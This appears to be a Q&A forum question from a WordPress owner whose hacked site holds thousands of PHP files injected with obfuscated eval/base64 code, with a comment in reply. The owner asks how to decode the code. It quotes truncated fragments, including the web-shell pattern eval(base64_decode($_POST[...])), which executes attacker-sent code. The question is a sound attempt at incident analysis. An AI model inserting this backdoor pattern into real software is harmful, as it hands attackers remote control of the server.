# How to view the eval(base64_decode code?

Tags: wordpress, base64, eval

My Wordpress website was hacked and recently got suspended by the host.

I am going through 3000+ .php files and have found lots of files infected by the '**eval**' and '**base64**' code injection. I know there is a way to decode the code and view what the hacker was actually trying to do where in my case 'posting the data from my site to his e-mail address'.

Here's a sample batch of base64 code from the hacker's 1000s of lines: if possible to figure out would be great to know the consequences of it: (I tried several base64 decoder online but they were still giving out encrypted code). Please check the code below:

first batch:

```
<?php ${"\x47L\x4f\x42A....."}
```

other batch:

```
eval(base64_decode($_POST["\x63od\x.... ;
```

Thanks in advance :)

Comment: http://stackoverflow.com/questions/4245594/security-breach-php-evalbase64-decode

Comment: eval(base64_decode($_POST["\x63od\x.... ; won't tell you anything without the post request a malicious user has posted to it.